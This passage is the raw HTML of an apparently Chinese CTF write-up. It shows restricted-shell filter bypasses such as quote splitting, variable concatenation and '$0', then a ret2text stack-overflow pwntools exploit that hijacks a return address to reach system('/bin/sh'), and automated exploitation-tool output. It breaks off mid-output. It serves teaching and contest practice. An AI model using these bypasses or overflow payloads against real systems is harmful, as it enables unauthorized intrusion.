src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"897\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-29-1024x897.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-683\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u7b2c\u4e00\u4e2a\u5c31\u662f\u5f88\u597d\u7528\u7684\u4e00\u7bc7<\/p>\n\n\n\n<p><a href=\"https:\/\/www.cnblogs.com\/falling-dusk\/p\/17871620.html\">pwn\u4e2d\u5e38\u89c1\u7684\u7ed5\u8fc7\uff08\u4ee5\u540e\u89c1\u591a\u4e86\u4f1a\u6162\u6162\u66f4\u7684\uff0c\u5495\u5495\u5495\uff09 &#8211; Falling_Dusk &#8211; \u535a\u5ba2\u56ed<\/a><\/p>\n\n\n\n<p>\u535a\u5ba2\u91cc\u9762\u4e13\u95e8\u6709\u8fc7\u6ee4\u201ccat\u201d\u7684\u7ed5\u8fc7\u65b9\u6cd5<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-28-1024x693.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"693\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-28-1024x693.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-682\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u8ddf\u7740\u535a\u5ba2\u4e00\u4e2a\u65b9\u6cd5\u4e00\u4e2a\u65b9\u6cd5\u8bd5\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>\u5927\u6982\u9884\u671f\u6d41\u7a0b\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nc ctf.ctbu.edu.cn 34193<br>Enter your command: sh<br>Privileges elevated! Starting restricted shell...<br>Restricted shell. ls is allowed, but some commands are blocked.<br>Try to get the flag, but remember: direct access is blocked!<br>$ ls<br>attachment<br>docker-entrypoint.sh<br>flag<br>$ cat flag<br>Command contains forbidden operations. Try another way.<br>$ c'a't flag                                              #\u6307\u4ee4\u62fc\u63a5\u7ed5\u8fc7\u6cd5<br>coctf{$0_1s_r1ght_981e8230-0763-4970-9796-fd3209b4dc21}<br>$ ls ; cat flag                                           #\u53e6\u7c7b\u7684\u7ed5\u8fc7\u68c0\u6d4b\u7684\u65b9\u6cd5\uff08\u535a\u5ba2\u91cc\u6ca1\u6709\uff09<br>attachment<br>docker-entrypoint.sh<br>flag<br>coctf{$0_1s_r1ght_981e8230-0763-4970-9796-fd3209b4dc21}<br>$ A=ca; B=t; $A$B flag                                    #\u535a\u5ba2\u91cc\u7684\u7b2c\u4e00\u79cd\u529e\u6cd5<br>coctf{$0_1s_r1ght_981e8230-0763-4970-9796-fd3209b4dc21}<\/code><\/pre>\n\n\n\n<p>\u5f53\u7136\uff0c\u5c31\u7b97\u4e0a\u9762\u7684\u6240\u6709\u4f60\u90fd\u6ca1\u5173\u6ce8\uff0c\u4f60\u53ea\u662f\u6253\u5f00IDA\u4e86\uff0c\u7136\u540e\u627e\u5230main\u51fd\u6570\u4e86\uff0c\u7136\u540e\u7ed9\u4e86\u5b83\u76f8\u5173\u51fd\u6570\u7684\u53cd\u7f16\u8bd1\u4ee3\u7801\u5185\u5bb9<\/p>\n\n\n\n<p>\u4f60\u968f\u610f\u5237\u7ed9\u4efb\u4f55\u4e00\u4e2aAI\u90fd\u80fd\u505a\u51fa\u672c\u9898\uff0c\u6bd4\u5982\u8c46\u5305\uff0ckimi\uff0cchatgpt\uff0cgrok\u7b49\u7b49\u7b49\u7b49<\/p>\n\n\n\n<p>\u751a\u81f3\u505a\u6cd5\u8fd8\u5f88\u591a\u6837<\/p>\n\n\n\n<p>\u8fd9\u91ccai\u6709\u5f88\u591a\u79cd\u505a\u6cd5\uff0c\u6bd4\u5982\uff1a<\/p>\n\n\n\n<p>\u4e24\u6b21$0\u63d0\u6743\uff0c\u76f4\u63a5\u907f\u514dcat\u68c0\u6d4b<\/p>\n\n\n\n<p>\u6548\u679c\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nc ctf.ctbu.edu.cn 34193<br>Enter your command: $0<br>Privileges elevated! Starting restricted shell...<br>Restricted shell. ls is allowed, but some commands are blocked.<br>Try to get the flag, but remember: direct access is blocked!<br>$ $0<br>ls<br>attachment<br>docker-entrypoint.sh<br>flag<br>cat flag<br>coctf{$0_1s_r1ght_981e8230-0763-4970-9796-fd3209b4dc21}<\/code><\/pre>\n\n\n\n<p>\u5f88\u795e\u5947\u5427\uff0c\u5177\u4f53\u539f\u7406\u8fd9\u91cc\u5c31\u4e0d\u591a\u8bf4\u4e86\uff0c\u5efa\u8bae\u81ea\u884cAI\uff0c\u5b9e\u5728\u4e0d\u61c2\u53c8\u597d\u5947\u7684\uff0c\u5728\u7fa4\u91cc\u627e\u51fa\u9898\u4ebaokabe\uff08<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">ret2text<\/h3>\n\n\n\n<p>\u8003\u70b9\uff1a\u5e38\u89c4\u7684ret2text<\/p>\n\n\n\n<p>\u4f5c\u4e3a\u6808\u6ea2\u51fa\u7684\u7ecf\u5178\u8003\u70b9\uff0cret2text\u662f\u65e0\u6570pwner\u7684\u542f\u8499<\/p>\n\n\n\n<p>\u5f53\u7136\uff0c\u8fd9\u91cc\u51fa\u9898\u4eba\u5f97\u5148\u81f4\u6b49\u6ed1\u8dea\uff0c\u5728\u9898\u5e72\u91cc\u6dfb\u52a0\u4e86\u65e0\u6548\u7684\u4fe1\u606f\uff08\u6808\u5e73\u8861\uff09\uff0c\u56e0\u4e3a\u51fa\u9898\u4eba\u8bef\u4ee5\u4e3a\u81ea\u5df1\u5f04\u768464\u4f4d\u67b6\u6784\u4e86\u2026\u2026Orz<\/p>\n\n\n\n<p>\u8bf4\u56de\u9898\u76ee<\/p>\n\n\n\n<p>\u6211\u4eec\u8fdbmain\u51fd\u6570\uff0cF5\u53cd\u7f16\u8bd1\u540e\uff0c\u770b\u5230\u7684\u5c31\u662f\u8fd9\u4e2a\u60c5\u51b5<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-27.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"710\" height=\"214\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-27.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-681\"  sizes=\"auto, (max-width: 710px) 100vw, 710px\" \/><\/div><\/figure>\n\n\n\n<p>\u5f88\u7a7a\u7684main\u51fd\u6570\uff0c\u5c31\u4e00\u4e2a<code>vuln()<\/code>\u51fd\u6570<\/p>\n\n\n\n<p>\u53cc\u51fb\u8ddf\u8fdb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ssize_t vuln()<br>{<br>  _BYTE buf&#91;24]; \/\/ &#91;esp+Ch] &#91;ebp-1Ch] BYREF<br><br>  printf(\"Enter your payload: \");<br>  return read(0, buf, 0x64u);<br>}<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u51fa\u73b0\u4e86\u6211\u4eec\u6240\u5173\u5fc3\u7684\u6f0f\u6d1e\u70b9<\/p>\n\n\n\n<p>read\u51fd\u6570\u7684\u6808\u6ea2\u51fa\u6f0f\u6d1e<\/p>\n\n\n\n<p>\u4ee3\u7801\u4e2d\u5b9a\u4e49\u4e86\u4e00\u4e2a\u6808\u4e0a\u7684\u7f13\u51b2\u533a <code>buf<\/code>\uff0c\u5927\u5c0f\u4e3a <strong>24 \u5b57\u8282<\/strong>\uff08<code>_BYTE buf[24]<\/code>\uff09\u3002\u4f46\u968f\u540e\u8c03\u7528 <code>read(0, buf, 0x64u)<\/code> \u65f6\uff0c\u8981\u6c42\u4ece\u6807\u51c6\u8f93\u5165\uff08<code>0<\/code> \u8868\u793a\u6807\u51c6\u8f93\u5165\uff09\u8bfb\u53d6 <strong>0x64 \u5b57\u8282\uff08\u5373 100 \u5b57\u8282\uff09<\/strong> \u5230 <code>buf<\/code> \u4e2d\u3002<\/p>\n\n\n\n<p>\u663e\u7136\uff0c100 \u5b57\u8282\u7684\u8f93\u5165\u8fdc\u5927\u4e8e\u7f13\u51b2\u533a 24 \u5b57\u8282\u7684\u5bb9\u91cf\uff0c\u591a\u4f59\u7684\u6570\u636e\u4f1a \u201c\u6ea2\u51fa\u201d \u7f13\u51b2\u533a<\/p>\n\n\n\n<p>\u90a3\u4e48\u73b0\u5728\u56de\u5230\u6808\u6ea2\u51fa\u8fd9\u4e2a\u8bdd\u9898\uff0c\u4ec0\u4e48\u662f<code>\u6808\u6ea2\u51fa<\/code>\uff1f<\/p>\n\n\n\n<p>\u521a\u521a\u8bf4\u5230\u4e86\uff0c\u8f93\u5165\u7684\u5185\u5bb9\u8fdc\u5927\u4e8ebuf\u7684\u5bb9\u91cf\uff0c\u591a\u4f59\u6570\u636e\u4f1a\u6ea2\u51fa\u7f13\u51b2\u533a\uff0c\u800c\u8fd9\u90e8\u5206\u591a\u4f59\u7684\u6570\u636e\uff0c\u4f1a\u5f80\u9ad8\u5730\u5740\u7684\u90e8\u5206\u8fdb\u884c\u5b58\u653e\uff0c\u4e5f\u5c31\u662f\u4f1a\u8986\u76d6\u539f\u672c\u5b83\u4eec\u5b58\u653e\u7684\u5185\u5bb9\uff0c\u5b58\u5165\u4f60\u653e\u5165\u7684\u6570\u636e\u5185\u5bb9\uff0c\u4e0d\u7ba1\u662f\u5783\u573e\u6570\u636e\u4e5f\u597d\uff0c\u4f60\u523b\u610f\u4fee\u6539\u7684\u6076\u610f\u6570\u636e\u5730\u5740\u4e5f\u597d\uff0c\u90fd\u4f1a\u5199\u8fdb\u53bb<\/p>\n\n\n\n<p>\u6808\u4e0a\u7684\u5e03\u5c40\u5927\u6982\u5c31\u662f\u4e0b\u9762\u8fd9\u6837<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\u9ad8\u5730\u5740   |||&#91;\u8fd4\u56de\u5730\u5740]   \/\/ \u51fd\u6570\u6267\u884c\u5b8c\u540e\u8981\u56de\u5230\u7684\u4f4d\u7f6e<br>        |||&#91;\u57fa\u6307\u9488ebp]  \/\/ \u4fdd\u5b58\u7684\u6808\u5e95\u6307\u9488<br>\u4f4e\u5730\u5740   |||&#91;buf]       \/\/ 24\u5b57\u8282\u7f13\u51b2\u533a\uff08\u4f4e\u5730\u5740\u65b9\u5411\uff09<\/code><\/pre>\n\n\n\n<p>\u90a3\u4e48\u5982\u679c\uff0c\u4f60\u586b\u5145\u5b8cbuf\u5185\u5bb9\uff0c\u518d\u8986\u76d6\u6389ebp\u7684\u6307\u9488\u5185\u5bb9<\/p>\n\n\n\n<p>\u7136\u540e\u5c31\u5230\u4e86\u8fd4\u56de\u5730\u5740\u5b58\u653e\u7684\u533a\u57df<\/p>\n\n\n\n<p>\u5982\u679c\u4f60\u4f20\u5165\u4e00\u4e2a\u4f60\u7cbe\u5fc3\u627e\u5230\u7684\u5185\u5b58\u5730\u5740\u5185\u5bb9\uff0c\u5b83\u4f1a\u600e\u4e48\u6837\u5462\uff1f<\/p>\n\n\n\n<p>\u5f53\u7136\u662f\u53bb\u6267\u884c\u4f60\u90a3\u4e2a\u5730\u5740\u4e0a\u7684\u5185\u5bb9<\/p>\n\n\n\n<p>\u6211\u4eec\u770b\u5230func\u7a97\u53e3\u6709win\u51fd\u6570\u5b57\u6837\uff0c\u70b9\u8fdb\u53bb\u770b\u770b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-26.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"909\" height=\"595\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-26.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-680\"  sizes=\"auto, (max-width: 909px) 100vw, 909px\" \/><\/div><\/figure>\n\n\n\n<p><em><strong>system(&#8220;\/bin\/sh&#8221;)<\/strong><\/em><\/p>\n\n\n\n<p>\u4e5f\u8bb8\u4f60\u4e0d\u77e5\u9053\u8fd9\u662f\u4ec0\u4e48\u610f\u601d\uff0c\u4f46\u662f\u4f60\u641c\u4e00\u641c\u5462<\/p>\n\n\n\n<p>\u5b9e\u9645\u4e0a\u968f\u4fbf\u641c\u641c\u5c31\u77e5\u9053\u8fd9\u662f\u4e00\u4e2a\u6253\u5f00shell\u7684system\u8c03\u7528<\/p>\n\n\n\n<p>\u90a3\u5982\u679c\uff0c\u6211\u4eec\u5c06\u8fd4\u56de\u5730\u5740\u7be1\u6539\u6210<code>win()<\/code>\u51fd\u6570\u7684\u5730\u5740<\/p>\n\n\n\n<p>\u662f\u4e0d\u662f\u5c31\u4f1a\u8ba9\u7a0b\u5e8f\u7684\u6267\u884c\u6d41\u7a0b\u8d70\u5230\u6211\u4eec\u60f3\u8981\u7684\u5730\u65b9\u53bb\uff1f<\/p>\n\n\n\n<p>\u4e0d\u5982\u76f4\u63a5\u5f00\u59cb\u8bd5\u4e00\u8bd5<\/p>\n\n\n\n<p>\u914d\u7f6e\u597d\u57fa\u672c\u7684pwn\u811a\u672c\u73af\u5883<\/p>\n\n\n\n<p>\uff08\u4f60\u7406\u5e94\u5728\u524d\u9762\u7684\u9898\u76ee\u91cc\u914d\u7f6e\u597d\u624d\u5bf9\uff09<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import *<br>io = process(\".\/text\")<br>payload = b'a'*(28 + 4) + p32(0x08049196)<br>io.sendline(payload)<br>io.interactive()<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">[x] Opening connection to ctf.ctbu.edu.cn on port 34196<br>[x] Opening connection to ctf.ctbu.edu.cn on port 34196: Trying 172.30.254.48<br>[+] Opening connection to ctf.ctbu.edu.cn on port 34196: Done<br>[*] Switching to interactive mode<br>Enter your payload: cat flag<br>coctf{ret2flag_640a465c2af5}<\/pre>\n\n\n\n<p>\u540e\u8bdd\uff1a\u5982\u679c\u6709\u5de5\u5177\u5c0f\u5b50\uff0c\u7528\u5999\u5999\u5c0f\u5de5\u5177\u80fd\u4e00\u628a\u68ad<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ python pwnpasi.py -l ..\/first_question\/text -ip ctf.ctbu.edu.cn -p 34196<br><br><br>        ____                 ____            _ <br>       |  _ \\ __      ___ _|  _ \\ __ _ ___(_)<br>       | |_) |\\ \\ \/\\ \/ \/ '_ \\ |_) \/ _` \/ __| |<br>       |  __\/  \\ V  V \/| | | |  __\/ (_| \\__ \\ |<br>       |_|      \\_\/\\_\/ |_| |_|_|   \\__,_|___\/_|<br><br>    Automated Binary Exploitation Framework v3.0<br>    by Security Research Team<br>    https:\/\/github.com\/heimao-box\/pwnpasi<br><br>&#91;*] &#91;09:44:09] target binary: .\/..\/first_question\/text<br>&#91;*] &#91;09:44:09] remote target: ctf.ctbu.edu.cn:34196<br>&#91;*] &#91;09:44:09] detecting libc path automatically<br>&#91;+] &#91;09:44:09] libc path detected: \/lib\/i386-linux-gnu\/libc.so.6<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                   BINARY ANALYSIS PHASE                    \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] &#91;09:44:09] setting executable permissions<br>&#91;*] &#91;09:44:09] collecting binary security information<br>&#91;*] &#91;09:44:09] collecting binary information<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                  BINARY SECURITY ANALYSIS                  \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>    Feature     |     Status      |   Risk Level   <br>---------------------------------------------------<br>     RELRO      |  Partial RELRO  |     MEDIUM     <br> Stack Canary   | No canary found |      HIGH      <br>    NX Bit      |   NX enabled    |       LOW      <br>      PIE       | No PIE (0x8048000) |     MEDIUM     <br> RWX Segments   |     Unknown     |       LOW      <br><br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                     FUNCTION ANALYSIS                      \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] &#91;09:44:10] scanning PLT functions<br>&#91;*] &#91;09:44:10] analyzing PLT table and available functions<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                     FUNCTION ANALYSIS                      \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>   Function     |     Address     |    Available   <br>---------------------------------------------------<br>     write      |       N\/A       |       NO       <br>     puts       |       N\/A       |       NO       <br>    printf      |    08049060     |       YES      <br>     main       |    080491fe     |       YES      <br>    system      |    08049070     |       YES      <br>   backdoor     |       N\/A       |       NO       <br>  callsystem    |       N\/A       |       NO       <br>&#91;*] &#91;09:44:10] <br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                    ROP GADGET DISCOVERY                    \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] &#91;09:44:10] searching for x32 ROP gadgets<br>&#91;*] &#91;09:44:10] searching for ROP gadgets (x32)<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                     ROP GADGETS (x32)                      \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>  Gadget Type   |     Address     |     Status     <br>---------------------------------------------------<br>    pop eax     |       N\/A       |    NOT FOUND   <br>    pop ebx     |       N\/A       |    NOT FOUND   <br>    pop ecx     |       N\/A       |    NOT FOUND   <br>    pop edx     |       N\/A       |    NOT FOUND   <br>&#91;*] &#91;09:44:10] <br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                    PADDING CALCULATION                     \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] &#91;09:44:10] performing dynamic stack overflow testing<br>&#91;*] &#91;09:44:10] testing for stack overflow vulnerability<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                  STACK OVERFLOW DETECTION                  \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] Testing overflow: &#91;\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588] 100%&#91;*] &#91;09:44:10] <br>&#91;+] &#91;09:44:10] stack overflow detected! Padding: 32 bytes<br>&#91;*] &#91;09:44:10] performing assembly-based overflow analysis<br>&#91;+] &#91;09:44:10] stack size: 28 bytes<br>&#91;+] &#91;09:44:10] overflow padding adjustment: 32 bytes<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502              VULNERABLE FUNCTIONS IDENTIFIED               